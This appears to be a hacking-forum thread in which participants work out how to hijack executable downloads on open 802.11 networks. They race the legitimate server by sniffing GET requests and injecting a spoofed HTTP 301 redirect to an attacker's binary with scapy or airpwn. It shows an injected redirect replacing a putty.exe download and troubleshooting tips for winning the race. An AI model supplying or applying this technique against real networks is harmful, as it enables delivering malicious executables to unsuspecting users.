does anyone have any knowledge regarding replacing an .exe file request on a broadcast network by exploiting a race condition... from what i understand at the moment one can sniff network traffic and, on finding the "content-type:application" request, respond to it with his own binary file... i think this would be even more cool than using ettercap filters and injecting code on the fly into an html page...
if this is possible it can also lead to a whole new kind of injection attack in 802.11 networks where an attacker can send data to the victim without even being associated to the AP.
I believe this is called header injection.
h**p://rturf.net/documentum/?View=entry&EntryID=272
Another
h**p://i8jesus.com/?p=18
Thanks a lot... it looks like an HTTP 301 response is the best thing to do, i have even seen an ettercap filter doing the same... will try to implement this using scapy on a wifi network... now must sit and start reading up on TCP to understand how the sequence number and ack numbers work and how the checksum is calculated...
there is another way of accomplishing this... we can write a customised tcp stack which should race and respond to the GET request, but the problem is this might become too complicated since i am trying to do it using packet injection for an 802.11 network without being associated to the AP, and i dunno how to handle and send executable files in packets... although i would like to learn about it, anybody who could put some light on this topic or point me to some interesting article would be great... any suggestions or alternative way of doing this will also be greatly appreciated.
alright i have achieved some progress but i'm stuck again
when a get request is being made, say
Code:
GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1
Host: the.earth.li
i am replying back with a 301 response as such
Code:
HTTP/1.1 301 Moved Permanently
Location: http://spool.metasploit.com/releases/framework-3.2.exe
but the result is turning out to be a request made to
Code:
/releases/framework-3.2.exerth.li/~sgtatham/putty/latest/x86/putty.exe
can anyone point out to me what i am doing wrong.
What tool are you using to do this?
One thing Mister_X kindly shed light on was that airpwn _should_ actually be able to do this out of the box. Unfortunately, I've never got airpwn to work right with mac80211 (even though it's "supported"). I'll try a test with my rt73 card soon and see if it will work in this scenario.
the problem was the 301 response had to end with a \r\n which was missing, therefore the problem occurred. now it's working but there is another problem: the race condition is effectively being exploited only the first time, since the first response being generated is inducing some amount of latency in the program, all the other get requests are being retrieved from a buffer and have already been serviced by the authentic source, therefore no more race condition exists because the program becomes slow and loses the race... any help with the program will be appreciated greatly
at the moment the only solution i think to the problem is that somehow flush the buffer and start the sniffer again... or somehow get the sniffer to stop sniffing when the program is injecting the packet.
by the way i am using scapy.
even i faced the same problem with airpwn for some time but later on figured out that running airodump using "-c" on the same channel as the victim network gets airpwn to correctly inject the data.